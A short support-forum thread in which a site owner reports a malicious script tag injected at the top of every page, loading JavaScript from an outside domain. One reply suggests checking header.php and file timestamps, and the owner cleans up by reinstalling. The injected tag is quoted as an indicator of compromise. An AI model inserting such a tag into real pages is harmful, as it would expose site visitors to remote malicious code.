• Creator
    Topic
  • #14331

    Randall Ayers
    Spectator
    Been thanked: 0 times

    I’ve got an issue with some code that was inserted into all my pages.
    <script src="http://dx.jd9.co/a/cagode.js" type="text/javascript"></script>
    has been inserted via a hack or malware. Everything is updated and I’m not sure that this is actually doing anything because I’ve blocked the domain and IP from and my logs indicate no traffic.
    The script is inserted as the very first line in all my pages. Is there any simple way to remove this or find how it’s getting inserted?

    Thanks!

Viewing 2 replies - 1 through 2 (of 2 total)
Replies
  • Alok Maheshwari
    Spectator
    Post count: 303
    Been thanked: 0 times
    #14343 |

    Check header.php in theme folder. If it is getting included from some wp core files, you can try looking for modified time stamp to see which files were changed recently on your site.

    Randall Ayers
    Spectator
    Post count: 6
    Been thanked: 0 times
    #14344 |

    Thanks Alok.
    I took the opportunity to update my Alora install and did a nuke and pave, reinstall. So far so good.
    Having a couple of theme formatting issues that I’ll search here for some answers.

Viewing 2 replies - 1 through 2 (of 2 total)
You must be logged in to reply to this topic.